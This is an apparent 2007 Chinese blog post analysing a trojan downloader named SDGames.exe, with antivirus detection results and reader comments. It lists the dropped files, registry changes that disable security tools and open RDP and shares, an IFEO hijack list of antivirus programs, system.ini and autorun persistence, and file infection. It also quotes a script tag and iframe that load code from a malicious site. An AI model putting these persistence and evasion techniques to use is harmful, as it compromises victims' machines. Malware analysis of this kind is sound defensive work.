百度空间 | 百度首页 
               
 
查看文章
  
有点意思的一个毒,瓢虫图标(Trojan-Downloader.Win32.VB.lg:SDGames.exe、Windows.url……)
2007-12-07 18:45

样本来源于深度样本区,帖子的标题很说的很牛X,于是看了一下;

他的行为的确不太良好,但图标不错,是一只漂亮的瓢虫,偶喜欢^_^

$K##E#X=$DIK+E+XDI=#KE$=X=+D+IK#E=#XD+IK=E+#XDI$KEX#+DIK#EX$D##I$K#EXD##I#K#$E$=X$#DIK$E+X$+D+$I$KE+$X

样本信息:

NORMAN 5.91.08 5.90 2007-12-06 W32/Hupigon.gen67 15.241
The Hacker 6.2.9 v00150 2007-12-04 W32/Behav-Heuristic-067 0.891
Prevx V2 20071206 2007-12-06 TROJAN.DOWNLOADER.GEN 7.715
F-SECURE 5.51.6100 2007.12.04.09 2007-12-04 Trojan-Downloader.Win32.VB.lg [AVP] 10.354
卡巴斯基 5.5.10 2007.12.07 2007-12-07 Trojan-Downloader.Win32.VB.lg 22.656
AntiVir 7.6.0.35 7.0.1.57 2007-12-07 TR/Crypt.FKM.Gen 8.346
QuickHeal 9.00 2007.12.05 2007-12-05 Suspicious - DNAScan 3.098
飞塔 2.81-3.11 8.449 2007-12-03 Suspicious 4.023
NOD32 2.70.10 2708 2007-12-07 probably unknown NewHeur_PE virus 0.593
F-PROT 4.4.1.52 20071206 2007-12-06 Possible W32/Heuristic-162!Eldorado (not disinfectable) 5.327
VirusBuster 4.3.19:9 9.116.3/11.0 2007-12-06 Packed/NSPack 4.753
迈克菲 5.2.00 5179 2007-12-06 New Malware.u 5.254
SOPHOS 2.49.1 4.21 2007-12-07 Mal/VB-G 15.872
nProtect 2007-12-05.00 1077844 2007-12-05 Generic.Malware.SP!DWYBVdTk.5A07877B 10.357
BitDefender 7.60825.958438 7.16147 2007-12-07 Generic.Malware.SP!DWYBVdTk.5A07877B 12.487
AVG 7.5.49.442 269.16.17/1176 2007-12-06 Downloader.Generic6.YBC 8.557
IKARUS T3.1.01.15 2007.12.05.69943 2007-12-05 Backdoor.Win32.Agent.ahj 2.393

KE$X+=D$I$K=E+XDIKE+#X=D=$I=K$+E#XDI$=KEX#D$IK#$EX+DI+#KE+X+D=I=#K$E#X=D$IKE++X$#DI$K#EX#D#I+$KE#X+DI

主要行为如下:

(一)病毒激活后循例地修改一下日期,接着创建文件:

C:\WINDOWS\system32\SDGames.exe
C:\WINDOWS\system32\Taskeep.vbs     (每隔一段时间自动运行病毒)
C:\WINDOWS\system32\Avpser.cmd     (结束创建安全软件的进程)
C:\WINDOWS\system32\netshare.cmd     (把所有的分区都共享出去)
C:\WINDOWS\system32\AUTORUN.INF

(二)之后修改注册表,涉及到一堆设置,如果不用软件而一个一个手动修复估计会挺麻烦的:


RegSetValue:HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\run
    值:Type: REG_SZ, Length: 64, Data: C:\WINDOWS\system32\SDGames.exe
RegSetValue:HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\load
    值:Type: REG_SZ, Length: 64, Data: C:\WINDOWS\system32\SDGames.exe
RegSetValue:HKCU\Software\Policies\Microsoft\Windows\System\DisableCMD
    值:Type: REG_DWORD, Length: 4, Data: 0
RegSetValue:HKLM\SOFTWARE\Microsoft\Security Center\AntiVirusOverride
    值:Type: REG_DWORD, Length: 4, Data: 0
RegSetValue:HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden
    值:Type: REG_DWORD, Length: 4, Data: 2
RegSetValue:HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue
    值:Type: REG_DWORD, Length: 4, Data: 0
RegSetValue:HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt
    值:Type: REG_DWORD, Length: 4, Data: 1
RegSetValue:HKCR\txtfile\shell\open\command\(Default)
    值:Type: REG_SZ, Length: 64, Data: C:\WINDOWS\system32\SDGames.exe
RegSetValue:HKCR\regfile\shell\open\command\(Default)
    值:Type: REG_SZ, Length: 64, Data: C:\WINDOWS\system32\SDGames.exe
RegSetValue:HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions
    值:Type: REG_DWORD, Length: 4, Data: 1
RegSetValue:HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel
    值:Type: REG_DWORD, Length: 4, Data: 1
RegSetValue:HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetTaskbar
    值:Type: REG_DWORD, Length: 4, Data: 1
RegSetValue:HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistrytools
    值:Type: REG_DWORD, Length: 4, Data: 1
RegSetValue:HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr
    值:Type: REG_DWORD, Length: 4, Data: 1
RegSetValue:HKLM\System\CurrentControlSet\Control\Terminal Server\fDenyTSConnections
    值:Type: REG_DWORD, Length: 4, Data: 0
RegSetValue:HKLM\System\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp\PortNumber
    值:Type: REG_DWORD, Length: 4, Data: 3389
RegSetValue:HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber
    值:Type: REG_DWORD, Length: 4, Data: 3389
RegSetValue:HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache\Enabled
    值:Type: REG_DWORD, Length: 4, Data: 0
RegSetValue:HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\ShutdownWithoutLogon
    值:Type: REG_DWORD, Length: 4, Data: 0
RegSetValue:HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\EnableAdminTSRemote
    值:Type: REG_DWORD, Length: 4, Data: 1
RegSetValue:HKLM\System\CurrentControlSet\Control\Terminal Server\TSEnabled
    值:Type: REG_DWORD, Length: 4, Data: 1
RegSetValue:HKLM\System\CurrentControlSet\Services\TermDD\Start
    值:Type: REG_DWORD, Length: 4, Data: 2
RegSetValue:HKLM\System\CurrentControlSet\Services\TermService\Start
    值:Type: REG_DWORD, Length: 4, Data: 2
RegSetValue:HKU\.DEFAULT\Keyboard Layout\Toggle\Hotkey
    值:Type: REG_DWORD, Length: 4, Data: 1
RegSetValue:HKLM\System\CurrentControlSet\Services\lanmanserver\parameters\AutoShareWks
    值:Type: REG_DWORD, Length: 4, Data: 1
RegSetValue:HKLM\System\CurrentControlSet\Services\lanmanserver\parameters\AutoShareServer
    值:Type: REG_DWORD, Length: 4, Data: 1
RegSetValue:HKLM\System\CurrentControlSet\Control\Lsa\restrictanonymous
    值:Type: REG_DWORD, Length: 4, Data: 0
RegSetValue:HKCU\Software\Microsoft\Internet Explorer\Main\Start Page
    值:Type: REG_SZ, Length: 64, Data: http://www.zhidaobaidu.10mb.cn/
RegSetValue:HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page
    值:Type: REG_SZ, Length: 14, Data: wangma
RegSetValue:HKCU\Software\Microsoft\Internet Explorer\Main\Default_Page_URL
    值:Type: REG_SZ, Length: 14, Data: wangma
RegSetValue:HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\Default_Page_URL
    值:Type: REG_SZ, Length: 14, Data: wangma
RegSetValue:HKLM\System\CurrentControlSet\Services\SharedAccess\Start
    值:Type: REG_DWORD, Length: 4, Data: 4
RegSetValue:HKLM\System\CurrentControlSet\Services\wuauserv Start
    值:Type: REG_DWORD, Length: 4, Data: 4
RegSetValue:HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Winstary
    值:Type: REG_SZ, Length: 64, Data: C:\WINDOWS\system32\SDGames.exe
RegDeleteValue:HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}
RegDeleteValue:HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}

(三)接着是IFEO如下的一堆:

360rpt.exe , 360Safe.exe , 360tray.EXE , adam.exe , AgentSvr.exe , AppSvc32.exe , autoruns.exe , avgrssvc.exe , AvMonitor.exe , avp.com , avp.exe , CCenter.exe , ccSvcHst.exe , FileDsty.exe , FTCleanerShell.exe , HijackThis.exe , IceSword.exe , iparmo.exe , Iparmor.exe , isPwdSvc.exe , kabaload.exe , KaScrScn.SCR , KASMain.exe , KASTask.exe , KAV32.exe , KAVDX.exe , KAVPFW.exe , KAVSetup.exe , KAVStart.exe , KISLnchr.exe , KMailMon.exe , KMFilter.exe , KPFW32.exe , KPFW32X.exe , KPFWSvc.exe , KRegEx.exe , KRepair.COM , KsLoader.exe , KVCenter.kxp , KvDetect.exe , KvfwMcl.exe , KVMonXP.kxp , KVMonXP_1.kxp , kvol.exe , kvolself.exe , KvReport.kxp , KVScan.kxp , KVSrvXP.exe , KVStub.kxp , kvupload.exe , kvwsc.exe , KvXP.kxp , KvXP_1.kxp , KWatch.exe , KWatch9x.exe , KWatchX.exe , loaddll.exe , MagicSet.exe , mcconsol.exe , mmqczj.exe , mmsk.exe , NAVSetup.exe , nod32krn.exe , nod32kui.exe , PFW.exe , PFWLiveUpdate.exe , QHSET.exe , Ras.exe , Rav.exe , RavMon.exe , RavMonD.exe , RavStub.exe , RavTask.exe , RegClean.exe , rfwcfg.exe , RfwMain.exe , rfwProxy.exe , rfwsrv.exe , Rsaupd.exe , runiep.exe , scan32.exe , safelive.exe , shcfg32.exe , SmartUp.exe , SREng.exe , symlcsvc.exe , SysSafe.exe , TrojanDetector.exe , Trojanwall.exe , TrojDie.kxp , UIHost.exe , UmxAgent.exe , UmxAttachment.exe , UmxCfg.exe , UmxFwHlp.exe , UmxPol.exe , UpLive.EXE.exe , WoptiClean.exe , zxsweep.exe , MainCon.exe , srgui.exe , QQ.exe , Shadowservice.exe , msconfig.exe

(四)C:\WINDOWS\system.ini下面加入如下内容,现在这个东西貌似很少见:

[windows]
shell=explorer.exe & C:\WINDOWS\system32\SDGames.exe
load=C:\WINDOWS\system32\SDGames.exe

(五)在各个分区根目录生成如下文件(url文件都指向于SDGames.exe):

SDGames.exe
Windows.url
Recycleds.url
新建文件夹.url
AUTORUN.INF

(六)接下来进行感染:扫描非系统分区的exe文件,如果文件大小比自身小就覆盖之,如果比自身大就进行感染;

但这个就有问题了,因为每次激活病毒或受感染文件后,它会以当前被运行的文件进行上面的操作,也就是这个文件就已经成为病毒的主文件了,在system32下生成的副本也是那个被运行东方文件;

就这样在极端的情况下它的感染方式很可能会导致文件大小一次比一次大,最后在某台机子上运行时它可能会非常大了,而运行后大部分的exe文件都会被直接覆盖掉……

(七)另外还有对网页文件写入iframe,指向于http://zhidaobaidu.10mb.cn/

=K$E=+X=#DI=+K#EXD=$I++K#E=$X$D$I+KE#X+D=IKE$+X$D+IKE+$XDIK+E#X=D#+I=$K+EX=#DI=+K+E+#X+D#I+#KEX$D=IK+E#X

其他相关方面

这个http://zhidaobaidu.10mb.cn,是一个模仿百度的站点,说是模仿,其实是有个iframe调用http://www.baidu.com/……

另外上面还有一个脚本调用,貌似见过了,但这个已经失效……

<script language=javascript src=http://xxx.bao01.com/0.js></script>

IKE#XD=I=+K+E+X$#D#=I=$KE$X=D#IKE$X+$D=$IK=EX=$D#$I+KE#XD#IKEXDI$#K+=EXD+I$K=#E+XD$IKE#X++D#+I#K#$E+$X#DI

转载请保留声明!(http://hi.baidu.com/dikex/blog/item/36300afa339a8c889e5146f5.html

作者dikex(六翼刺猬),原文链接:http://hi.baidu.com/dikex/blog/item/1534ae8f9896e8f9513d92d2.html


类别:东邪西毒 | 添加到搜藏 | 浏览() | 评论 (6)
 
最近读者:
 
网友评论:
1
2007-12-07 19:01 | 回复
这瓢虫才4星
 
2
2007-12-07 19:06 | 回复
这个毒真有意思。。。^^
 
3
2007-12-07 20:00 | 回复
还有一个vb脚本,两个批处理
 
4
2007-12-07 20:44 | 回复
确实有点损人不利己。
 
5
2007-12-08 01:13 | 回复
好狠的毒,收藏下 循环劫持会怎么样?
 
7
2007-12-08 11:50 | 回复
该程序会出错无法运行
 
发表评论:
姓 名:
网址或邮箱: (选填)
内 容:
验证码: 请点击后输入四位验证码,字母不区分大小写
      

     

©2009 Baidu